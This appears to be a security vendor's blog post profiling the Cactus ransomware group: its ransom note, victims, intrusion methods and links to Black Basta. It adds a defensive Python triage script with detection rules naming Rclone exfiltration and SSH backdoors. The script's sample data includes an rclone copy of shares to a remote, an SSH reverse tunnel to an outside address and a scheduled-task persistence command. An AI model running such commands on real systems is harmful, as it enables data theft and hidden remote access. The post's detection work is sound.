
Who is behind Cactus ransomware?
Cactus ransomware doesn't get enough attention. This threat group doesn't have the longevity of LockBit or the resources of Volt Typhoon, but it makes the most of what it does have. In the twelve months since Cactus was first observed targeting large commercial entities, it has successfully attacked some of the largest companies in the United States, Italy, the United Kingdom, Switzerland, and France.
Who and what is Cactus ransomware?
Cactus ransomware has been attacking commercial entities since March 2023, and so far it has been very successful by criminal standards. In one study on the growth of ransomware, the SANS Institute tracked Cactus as one of the fastest-growing threat actors of that year. This study also found that 17% of all ransomware attacks in 2023 were conducted by new groups that did not exist in 2022. Cactus was one of the top five threats in this new group of threat actors.
The group name comes from the filename of the ransom note, “cAcTuS.readme.txt”. Encrypted files are renamed with the extension .CTSx, where x is a single-digit number that varies between attacks.
The ransom note reads as follows:
###
Your corporate network was compromised and encrypted by Cactus.
Do not interrupt the encryption process, don't stop or reboot your machines until the encryption is
complete. Otherwise the data may be corrupted.
In addition to the encrypted infrastructure, we have downloaded a lot of confidential information from
your systems. The publication of these documents may cause the termination of your commercial
activities, contracts with your clients and partners, and multiple lawsuits.
If you ignore this warning and do not contact us, your sensitive data will be posted on our blog:
###
The remaining text has been redacted. You can see the full note here.
Cactus is a typical double-extortion, Ransomware-as-a-Service (RaaS) operation: data is stolen before it is encrypted, and the threat of publication is used as a second lever for payment. The operators have shown they can spin up new attacks very quickly, especially by weaponizing newly published CVEs. This group is an evolving and challenging threat for security teams.
Notable attacks
Cactus has been in the headlines lately for its successful attack on Schneider Electric in January 2024. Schneider Electric is a French multinational company with hundreds of office locations around the world, including several in the United States. The company has thousands of enterprise clients and an Energy & Power market share of 35.7%. Only the Sustainability Business division was compromised in the incident, but that division’s customers include Clorox, DHL, DuPont, Hilton, PepsiCo, and Walmart. Cactus claims to have pulled 1.5TB of Schneider’s data before launching the ransomware.
Schneider Electric was also one of the thousands of companies affected by the MOVEit data breach in 2023.
Cactus has had several other global victims, including Marfrig Global Foods and MINEMAN Systems. Both companies impact worldwide supply chains. Cactus has listed over 100 victims on its leak site, but we don’t know how many other victims have paid a ransom and remain unlisted.
Characteristics
This group is known for breaking into networks by exploiting known vulnerabilities in VPN appliances and Qlik Sense software. The group also conducts phishing attacks, buys stolen credentials through crime forums, and partners with malware distributors. Microsoft Threat Intelligence observed threat actor Storm-0216 using malvertising and a backdoor trojan to deploy Cactus ransomware.
The Microsoft thread on X has more details of this attack.
Ransomware relies on one or more encryption binaries to encrypt the files on a system. These binaries are normally executed only after the criminals have finished learning about the victim, stealing data, and doing whatever else they want in the environment. Cactus is unusual in that its encryptor is itself stored on disk in encrypted form, so signature-based tools do not recognize the file. The encrypted binary cannot be launched unless the decryption key is available, which also means defenders cannot rely on scanning the dropped file alone: detection has to key on the behaviour around it, such as the decrypt-and-launch step. This is why the group calls for a multi-layered approach to threat detection and mitigation rather than a single antivirus control.
That aside, Cactus ransomware isn't that fancy. The operators use off-the-shelf scanners to find known vulnerabilities in targets. Once inside a network, Cactus uses Living-off-the-Land (LotL) tactics to explore the environment and stay hidden. The group uses Rclone for data exfiltration, a PowerShell script to automate the encryption process, and Scheduled Tasks to decrypt the binary. They also drop an SSH backdoor on the system to establish persistence and communication with the command-and-control (C2) servers. When they are ready, they launch encryption with the TotalExec.ps1 script.
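The file-system artefacts named above (the cAcTuS.readme.txt note and the .CTS<digit> extension) and the behavioural indicators in this section (Rclone, TotalExec.ps1, scheduled-task creation, an SSH client used as a backdoor) can be turned into a small triage check. The script below is an added example written for this post, not Cactus tooling or Barracuda code. The file paths, process events, host names and the 203.0.113.10 address are constructed sample data; the event field names (host, image, command_line) and the rule weights and threshold are assumptions for illustration, not a real EDR schema or published detection logic.

```python
# Added example: triage a file listing and process-creation telemetry for the
# Cactus indicators described in the post. Sample data below is constructed.
import re
from collections import defaultdict

# File-system artefacts from the post: ransom note name and .CTS<digit> extension.
RANSOM_NOTE = "cactus.readme.txt"            # dropped as cAcTuS.readme.txt; matched case-insensitively
ENCRYPTED_EXT = re.compile(r"\.cts\d$", re.IGNORECASE)

# Behavioural indicators from the post, as (rule name, regex over image + command line, weight).
# Weights and the threshold in flag_hosts() are an arbitrary triage assumption.
PROCESS_RULES = [
    ("rclone_exfil",          re.compile(r"(^|\\)rclone(\.exe)?\b", re.I), 3),
    ("totalexec_launcher",    re.compile(r"totalexec\.ps1", re.I), 5),
    ("scheduled_task_create", re.compile(r"(^|\\)schtasks(\.exe)?\b.*\s/create\b", re.I), 2),
    ("ssh_backdoor",          re.compile(r"(^|\\)sshd?(\.exe)?\b", re.I), 2),
]


def scan_file_listing(paths):
    """Return {directory: (ransom_note_present, encrypted_file_count)} for every
    directory that holds at least one Cactus artefact."""
    seen = defaultdict(lambda: [False, 0])
    for p in paths:
        directory, _, name = p.replace("/", "\\").rpartition("\\")
        entry = seen[directory]
        if name.lower() == RANSOM_NOTE:
            entry[0] = True
        elif ENCRYPTED_EXT.search(name):
            entry[1] += 1
    return {d: tuple(v) for d, v in seen.items() if v[0] or v[1]}


def score_process_events(events):
    """Score each host's process-creation events against PROCESS_RULES.
    Returns {host: (total_score, sorted list of distinct rule names hit)}."""
    hits = defaultdict(list)
    for ev in events:
        cmd = f"{ev['image']} {ev.get('command_line', '')}"
        for name, pattern, weight in PROCESS_RULES:
            if pattern.search(cmd):
                hits[ev["host"]].append((name, weight))
    return {h: (sum(w for _, w in hs), sorted({n for n, _ in hs})) for h, hs in hits.items()}


def flag_hosts(scores, threshold=4):
    """Hosts whose combined score reaches the threshold; a lone low-weight hit
    (for example a developer's legitimate ssh.exe) stays below it."""
    return sorted(h for h, (score, _) in scores.items() if score >= threshold)


# Constructed sample data (hypothetical hosts, paths and IP; 203.0.113.10 is a documentation address).
SAMPLE_PATHS = [
    r"\\FS01\Finance\Q4\budget.xlsx.CTS1",
    r"\\FS01\Finance\Q4\forecast.docx.CTS1",
    r"\\FS01\Finance\Q4\cAcTuS.readme.txt",
    r"\\FS01\Public\readme.txt",
    r"C:\Users\jdoe\Desktop\notes.txt",
]
SAMPLE_EVENTS = [
    {"host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\TotalExec.ps1"},
    {"host": "WS-042", "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r"schtasks /create /tn Updates /tr C:\ProgramData\run.bat /sc onstart"},
    {"host": "SRV-FILE01", "image": r"C:\Tools\rclone.exe",
     "command_line": r"rclone.exe copy D:\Shares remote:backup --transfers 8"},
    {"host": "SRV-FILE01", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "command_line": r"ssh.exe -N -R 2222:localhost:3389 user@203.0.113.10"},
    {"host": "WS-007", "image": r"C:\Program Files\Git\usr\bin\ssh.exe",
     "command_line": r"ssh.exe git@github.com"},
    {"host": "WS-007", "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    print("file artefacts:", scan_file_listing(SAMPLE_PATHS))
    scores = score_process_events(SAMPLE_EVENTS)
    print("host scores:", scores)
    print("flagged:", flag_hosts(scores))
```

The point of the weighting is the caveat in the text: none of these indicators is conclusive on its own (Rclone and OpenSSH both have legitimate uses), so a single hit should raise a hunt, not an incident, while TotalExec.ps1 together with a fresh scheduled task on the same host should page someone. Tune the weights and threshold to what is normal in your environment before relying on it.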
Relationships to other threats
Not much is known about Cactus, but the operators appear to be skilled and experienced. The TotalExec.ps1 script used by Cactus was already in use by the Black Basta group in 2022. Black Basta threat actors have been linked to Conti, BlackMatter, and Storm-0216, and Storm-0216 is the threat actor behind the malvertising campaign mentioned earlier.
The Cactus Tactics, Techniques and Procedures (TTPs) are similar to those of Magnet Goblin, but researchers haven’t yet confirmed a connection between them.
Protect your company
Cactus ransomware is an interesting and dangerous player among ransomware gangs. The binary encryption and LotL techniques are designed to hide from all but the most advanced threat protection.
Barracuda offers complete ransomware protection and the industry’s most comprehensive cybersecurity platform. Visit our website to see how we defend email, network, applications, and data.
